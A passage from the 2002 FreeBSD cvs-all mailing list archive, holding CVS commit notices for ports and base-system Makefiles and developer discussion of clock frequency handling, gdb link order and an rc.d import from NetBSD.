Message-ID: Lines: 9 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Poul-Henning Kamp writes: > I would be grateful if somebody would run "make test" in src/lib/libmd > on alpha and ia64, just to make sure this works as expected. Seems to work on Alpha. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 9:42:22 2002 Delivered-To: cvs-all@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 63BA137B401; Sat, 22 Jun 2002 09:42:18 -0700 (PDT) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.12.3/8.12.2) with ESMTP id g5MGeOCn000649; Sat, 22 Jun 2002 18:40:25 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Luigi Rizzo Cc: Mark Peek , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/i386/isa clock.c In-Reply-To: Your message of "Sat, 22 Jun 2002 09:32:50 PDT." <20020622093250.C92778@iguana.icir.org> Date: Sat, 22 Jun 2002 18:40:24 +0200 Message-ID: <648.1024764024@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message <20020622093250.C92778@iguana.icir.org>, Luigi Rizzo writes: >On Sat, Jun 22, 2002 at 09:30:19AM -0700, Mark Peek wrote: >> mp 2002/06/22 09:30:19 PDT >> >> Modified files: >> sys/i386/isa clock.c >> Log: >> Clock frequencies reported by sysctl should be unsigned values. Discovered >> when machdep.tsc_freq returned a negative number on a 2.2GHz Xeon. > >so we have a couple of years before hitting another barrier with 4GHz >boxes... It's mostly harmless to make it a 64bit quantity, but there is a nasty division in the timecounter-windup function which would get nastier. I have been playing with a model where the division is done once and for all, and any frequency correction is done by multiplication with a precomputed fiddle-factor. That would make it entirely harmless to make it 64bit. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 9:48:10 2002 Delivered-To: cvs-all@freebsd.org Received: from iguana.icir.org (iguana.icir.org [192.150.187.36]) by hub.freebsd.org (Postfix) with ESMTP id 134FD37B400; Sat, 22 Jun 2002 09:48:05 -0700 (PDT) Received: (from rizzo@localhost) by iguana.icir.org (8.11.6/8.11.3) id g5MGm2I95346; Sat, 22 Jun 2002 09:48:02 -0700 (PDT) (envelope-from rizzo) Date: Sat, 22 Jun 2002 09:48:02 -0700 From: Luigi Rizzo To: Poul-Henning Kamp Cc: Mark Peek , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/i386/isa clock.c Message-ID: <20020622094802.D92778@iguana.icir.org> References: <20020622093250.C92778@iguana.icir.org> <648.1024764024@critter.freebsd.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <648.1024764024@critter.freebsd.dk>; from phk@critter.freebsd.dk on Sat, Jun 22, 2002 at 06:40:24PM +0200 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, Jun 22, 2002 at 06:40:24PM +0200, Poul-Henning Kamp wrote: ... > It's mostly harmless to make it a 64bit quantity, but there is a nasty > division in the timecounter-windup function which would get nastier. speaking of clocks: I have had recurrent problems in the past with boxes using the 8254 as timecounter, saying "microtime went backwards" and showing negative tv_usec values in struct timeval fields returned by gettimeofday. The workaround is to use TSC, but there appears to be a problem in the timekeeping code with the 8254 -- any idea on where this could come from ? cheers luigi ----------------------------------+----------------------------------------- Luigi RIZZO, luigi@iet.unipi.it . ICSI (on leave from Univ. di Pisa) http://www.iet.unipi.it/~luigi/ . 1947 Center St, Berkeley CA 94704 Phone: (510) 666 2927 ----------------------------------+----------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 9:52:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9049C37B40D; Sat, 22 Jun 2002 09:52:35 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MGqZM78970; Sat, 22 Jun 2002 09:52:35 -0700 (PDT) (envelope-from obrien) Message-Id: <200206221652.g5MGqZM78970@freefall.freebsd.org> From: "David E. O'Brien" Date: Sat, 22 Jun 2002 09:52:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/gnu/usr.bin/binutils Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/22 09:52:34 PDT Modified files: gnu/usr.bin/binutils Makefile Log: Take the guaranteed fix -- turn off .info docs for now until we get the gdb docs sorted out. Revision Changes Path 1.17 +1 -1 src/gnu/usr.bin/binutils/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10: 0:16 2002 Delivered-To: cvs-all@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [66.92.13.169]) by hub.freebsd.org (Postfix) with ESMTP id 0654937B400; Sat, 22 Jun 2002 10:00:06 -0700 (PDT) Received: from dragon.nuxi.com (obrien@localhost [127.0.0.1]) by dragon.nuxi.com (8.12.3/8.12.2) with ESMTP id g5MH05P8051998; Sat, 22 Jun 2002 10:00:05 -0700 (PDT) (envelope-from obrien@dragon.nuxi.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.12.4/8.12.3/Submit) id g5MH043d051989; Sat, 22 Jun 2002 10:00:04 -0700 (PDT) Date: Sat, 22 Jun 2002 10:00:04 -0700 From: "David O'Brien" To: Bruce Evans Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/gnu/usr.bin/binutils/gdb Makefile Message-ID: <20020622100004.A44001@dragon.nuxi.com> Reply-To: obrien@FreeBSD.org Mail-Followup-To: David O'Brien , Bruce Evans , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206211905.g5LJ5Ke39248@freefall.freebsd.org> <20020622201241.K7645-100000@gamplex.bde.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020622201241.K7645-100000@gamplex.bde.org>; from bde@zeta.org.au on Sat, Jun 22, 2002 at 08:26:30PM +1000 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, Jun 22, 2002 at 08:26:30PM +1000, Bruce Evans wrote: > On Fri, 21 Jun 2002, David E. O'Brien wrote: > > > obrien 2002/06/21 12:05:20 PDT > > > > Modified files: > > gnu/usr.bin/binutils/gdb Makefile > > Log: > > We need to link with libiberty.a before libreadline.so. Both supply > > xmalloc() and xrealloc() and the mixed usage of xmalloc in some .c's from > > libiberty.a and other .c's from libreadline.so produces an unusable binary > > on the Alpha. > > Not to mention that it results in a nonexistent binary on i386's when > the error of mixing x*alloc()s is detected by linking statically. This > has been breaking worlds for about 5 months. Wish you had mentioned it 5 months ago. :-) Is the build failure you sent me with static linking? I cannot reproduce it anywhere. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10: 0:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5A15B37B42A; Sat, 22 Jun 2002 10:00:49 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MH0nV79912; Sat, 22 Jun 2002 10:00:49 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206221700.g5MH0nV79912@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 10:00:49 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/mod_log_mysql Makefile distinfo ports/www/mod_log_mysql/files patch-mod_log_mysql.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 10:00:49 PDT Modified files: www/mod_log_mysql Makefile distinfo www/mod_log_mysql/files patch-mod_log_mysql.c Log: upgrade to 1.16 PR: 39122 Submitted by: maintainer Revision Changes Path 1.5 +5 -4 ports/www/mod_log_mysql/Makefile 1.4 +1 -1 ports/www/mod_log_mysql/distinfo 1.3 +81 -41 ports/www/mod_log_mysql/files/patch-mod_log_mysql.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10: 3:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DC98A37B405; Sat, 22 Jun 2002 10:03:13 -0700 (PDT) Received: (from jdp@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MH3DZ80135; Sat, 22 Jun 2002 10:03:13 -0700 (PDT) (envelope-from jdp) Message-Id: <200206221703.g5MH3DZ80135@freefall.freebsd.org> From: John Polstra Date: Sat, 22 Jun 2002 10:03:13 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/libexec/rtld-elf Makefile X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jdp 2002/06/22 10:03:13 PDT Modified files: (Branch: RELENG_4) libexec/rtld-elf Makefile Log: MFC 1.16: Remove maintainer line. Revision Changes Path 1.10.2.6 +1 -2 src/libexec/rtld-elf/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10: 4:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9D68A37B40B; Sat, 22 Jun 2002 10:04:14 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MH4Eh80281; Sat, 22 Jun 2002 10:04:14 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206221704.g5MH4Eh80281@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 10:04:14 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/mipsel-linux-binutils Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 10:04:14 PDT Modified files: devel/mipsel-linux-binutils Makefile distinfo Log: change master site repack source from zip(9M) to bzip2(7M) PR: 39123 Submitted by: maintainer Revision Changes Path 1.4 +3 -3 ports/devel/mipsel-linux-binutils/Makefile 1.3 +1 -1 ports/devel/mipsel-linux-binutils/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10: 6:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 51C7B37B416; Sat, 22 Jun 2002 10:06:28 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MH6S984694; Sat, 22 Jun 2002 10:06:28 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206221706.g5MH6S984694@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 10:06:28 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/math/GiNaC Makefile ports/math/clarence Makefile ports/math/freefem Makefile ports/math/newmat Makefile ports/math/oleo Makefile ports/math/physcalc Makefile ports/math/plplot Makefile ports/math/rascal Makefile ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 10:06:27 PDT Modified files: math/GiNaC Makefile math/clarence Makefile math/freefem Makefile math/newmat Makefile math/oleo Makefile math/physcalc Makefile math/plplot Makefile math/rascal Makefile math/spar Makefile math/vtk Makefile Log: Replace ${PERL} with ${REINPLACE_CMD} PR: 39656 Submitted by: Oliver Braun Revision Changes Path 1.17 +3 -2 ports/math/GiNaC/Makefile 1.4 +2 -1 ports/math/clarence/Makefile 1.14 +3 -2 ports/math/freefem/Makefile 1.3 +2 -1 ports/math/newmat/Makefile 1.29 +2 -1 ports/math/oleo/Makefile 1.5 +2 -1 ports/math/physcalc/Makefile 1.22 +2 -1 ports/math/plplot/Makefile 1.15 +2 -1 ports/math/rascal/Makefile 1.6 +3 -2 ports/math/spar/Makefile 1.17 +3 -2 ports/math/vtk/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10: 7:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 82A2E37B40F; Sat, 22 Jun 2002 10:07:45 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MH7j085090; Sat, 22 Jun 2002 10:07:45 -0700 (PDT) (envelope-from obrien) Message-Id: <200206221707.g5MH7j085090@freefall.freebsd.org> From: "David E. O'Brien" Date: Sat, 22 Jun 2002 10:07:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/gnu/usr.bin/binutils/gdb Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/22 10:07:45 PDT Modified files: gnu/usr.bin/binutils/gdb Makefile Log: When linking staticaly libtermcap is a postrequisite of libreadline. Otherwise `tgoto' (only used by libreadline) isn't resolved. Submitted by: bde Revision Changes Path 1.59 +3 -2 src/gnu/usr.bin/binutils/gdb/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10:11: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DBB8C37B401; Sat, 22 Jun 2002 10:10:53 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MHArd86051; Sat, 22 Jun 2002 10:10:53 -0700 (PDT) (envelope-from obrien) Message-Id: <200206221710.g5MHArd86051@freefall.freebsd.org> From: "David E. O'Brien" Date: Sat, 22 Jun 2002 10:10:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/gnu/usr.bin/binutils Makefile src/gnu/usr.bin/binutils/doc Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/22 10:10:53 PDT Modified files: gnu/usr.bin/binutils Makefile gnu/usr.bin/binutils/doc Makefile Log: For the benefit of those Emacs users amongst us, only cut out gdb.info rather than *.info. Revision Changes Path 1.18 +1 -1 src/gnu/usr.bin/binutils/Makefile 1.10 +1 -1 src/gnu/usr.bin/binutils/doc/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10:11:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BBDA337B410; Sat, 22 Jun 2002 10:10:57 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MHAvG86128; Sat, 22 Jun 2002 10:10:57 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206221710.g5MHAvG86128@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 10:10:57 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 10:10:57 PDT Modified files: . modules Log: lapack++ --> ports/math/lapack++ Revision Changes Path 1.5398 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10:12: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BCE4037B40F; Sat, 22 Jun 2002 10:10:55 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MHAtX86093; Sat, 22 Jun 2002 10:10:55 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206221710.g5MHAtX86093@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 10:10:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/math Makefile ports/math/lapack++ Makefile distinfo pkg-comment pkg-descr pkg-plist ports/math/lapack++/files patch-blas++_test patch-blaspp:testing:makefile patch-eigslv.cc patch-lapack++_test patch-laslv.h patch-makefile ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 10:10:55 PDT Modified files: math Makefile Added files: math/lapack++ Makefile distinfo pkg-comment pkg-descr pkg-plist math/lapack++/files patch-blas++_test patch-blaspp:testing:makefile patch-eigslv.cc patch-lapack++_test patch-laslv.h patch-makefile patch-makefile.def patch-matrix_test Log: add lapack++ 1.1 Linear Algebra PACKage in C++, a wrapper for LAPACK PR: 39653 Submitted by: Nakata Maho Revision Changes Path 1.185 +1 -0 ports/math/Makefile 1.1 +45 -0 ports/math/lapack++/Makefile (new) 1.1 +5 -0 ports/math/lapack++/distinfo (new) 1.1 +11 -0 ports/math/lapack++/files/patch-blas++_test (new) 1.1 +11 -0 ports/math/lapack++/files/patch-blaspp:testing:makefile (new) 1.1 +61 -0 ports/math/lapack++/files/patch-eigslv.cc (new) 1.1 +11 -0 ports/math/lapack++/files/patch-lapack++_test (new) 1.1 +11 -0 ports/math/lapack++/files/patch-laslv.h (new) 1.1 +29 -0 ports/math/lapack++/files/patch-makefile (new) 1.1 +44 -0 ports/math/lapack++/files/patch-makefile.def (new) 1.1 +11 -0 ports/math/lapack++/files/patch-matrix_test (new) 1.1 +1 -0 ports/math/lapack++/pkg-comment (new) 1.1 +12 -0 ports/math/lapack++/pkg-descr (new) 1.1 +65 -0 ports/math/lapack++/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10:14:43 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D81A237B401; Sat, 22 Jun 2002 10:14:39 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MHEd686720; Sat, 22 Jun 2002 10:14:39 -0700 (PDT) (envelope-from obrien) Message-Id: <200206221714.g5MHEd686720@freefall.freebsd.org> From: "David E. O'Brien" Date: Sat, 22 Jun 2002 10:14:39 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/mutt Makefile ports/mail/mutt/files patch-01 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/22 10:14:39 PDT Modified files: mail/mutt Makefile Removed files: mail/mutt/files patch-01 Log: Remove all charmaps related bits. They aren't needed for 1.4. Revision Changes Path 1.115 +0 -7 ports/mail/mutt/Makefile 1.14 +0 -11 ports/mail/mutt/files/patch-01 (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10:18:17 2002 Delivered-To: cvs-all@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [66.92.13.169]) by hub.freebsd.org (Postfix) with ESMTP id 5978B37B401; Sat, 22 Jun 2002 10:18:13 -0700 (PDT) Received: from dragon.nuxi.com (obrien@localhost [127.0.0.1]) by dragon.nuxi.com (8.12.3/8.12.2) with ESMTP id g5MHICP8057833; Sat, 22 Jun 2002 10:18:12 -0700 (PDT) (envelope-from obrien@dragon.nuxi.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.12.4/8.12.3/Submit) id g5MHIC40057832; Sat, 22 Jun 2002 10:18:12 -0700 (PDT) Date: Sat, 22 Jun 2002 10:18:12 -0700 From: "David O'Brien" To: Doug Barton Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, gordon@FreeBSD.org, Mike Makonnen Subject: Re: cvs commit: src/etc/rc.d - Imported sources Message-ID: <20020622101812.A57423@dragon.nuxi.com> Reply-To: obrien@FreeBSD.org Mail-Followup-To: David O'Brien , Doug Barton , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, gordon@FreeBSD.org, Mike Makonnen References: <200206211907.g5LJ7Li42640@freefall.freebsd.org> <3D13E5C4.504DE4D9@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3D13E5C4.504DE4D9@FreeBSD.org>; from DougB@FreeBSD.org on Fri, Jun 21, 2002 at 07:49:40PM -0700 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Fri, Jun 21, 2002 at 07:49:40PM -0700, Doug Barton wrote: > > Log Message: > > Sync with NetBSD's mainline. > > Ummm.... two questions. Did you coordinate this change (and the import > of sbin/rcorder) with Mike or Gordon? It is a beign action. Gordon knew I was going to do it soon. > Second, what do you plan to do with the conflicts? Nothing. > We're actively working on this stuff now, so I'm not > sure that this import is a Good Thing, but maybe I missed something... Yep :-) that's why I updated the vendor branch for reference. Any patch sent back to NetBSD (the vendor) will need to be against their latest code, not their 1 year old code. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10:20:26 2002 Delivered-To: cvs-all@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 9722337B401; Sat, 22 Jun 2002 10:20:22 -0700 (PDT) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.12.3/8.12.2) with ESMTP id g5MHITCn007752; Sat, 22 Jun 2002 19:18:29 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Dag-Erling Smorgrav Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/lib/libmd md5c.c In-Reply-To: Your message of "22 Jun 2002 18:41:17 +0200." Date: Sat, 22 Jun 2002 19:18:29 +0200 Message-ID: <7751.1024766309@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message , Dag-Erling Smorgrav writes: >Poul-Henning Kamp writes: >> I would be grateful if somebody would run "make test" in src/lib/libmd >> on alpha and ia64, just to make sure this works as expected. > >Seems to work on Alpha. Thanks! -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10:24:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 99CF137B407; Sat, 22 Jun 2002 10:23:30 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MHNUB88121; Sat, 22 Jun 2002 10:23:30 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206221723.g5MHNUB88121@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 10:23:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc/acron Makefile ports/misc/bb Makefile ports/misc/cpuid Makefile ports/misc/demoniac Makefile ports/misc/dotfile Makefile ports/misc/ewipe Makefile ports/misc/floatator Makefile ports/misc/goblin Makefile ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 10:23:30 PDT Modified files: misc/acron Makefile misc/bb Makefile misc/cpuid Makefile misc/demoniac Makefile misc/dotfile Makefile misc/ewipe Makefile misc/floatator Makefile misc/goblin Makefile misc/gonvert Makefile misc/grc Makefile misc/gretl Makefile misc/qhacc Makefile misc/quantlib Makefile misc/shc Makefile misc/txt2regex Makefile misc/xpns Makefile misc/yaunc Makefile Log: Replace ${PERL} with ${REINPLACE_CMD} PR: 39665 Submitted by: Oliver Braun Revision Changes Path 1.10 +3 -2 ports/misc/acron/Makefile 1.11 +2 -1 ports/misc/bb/Makefile 1.4 +2 -1 ports/misc/cpuid/Makefile 1.3 +2 -1 ports/misc/demoniac/Makefile 1.21 +3 -2 ports/misc/dotfile/Makefile 1.22 +3 -2 ports/misc/ewipe/Makefile 1.3 +2 -1 ports/misc/floatator/Makefile 1.2 +4 -2 ports/misc/goblin/Makefile 1.6 +3 -2 ports/misc/gonvert/Makefile 1.4 +2 -1 ports/misc/grc/Makefile 1.4 +3 -2 ports/misc/gretl/Makefile 1.27 +2 -1 ports/misc/qhacc/Makefile 1.4 +4 -3 ports/misc/quantlib/Makefile 1.3 +2 -1 ports/misc/shc/Makefile 1.8 +3 -2 ports/misc/txt2regex/Makefile 1.11 +3 -2 ports/misc/xpns/Makefile 1.7 +3 -2 ports/misc/yaunc/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10:47:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CEA4737B403; Sat, 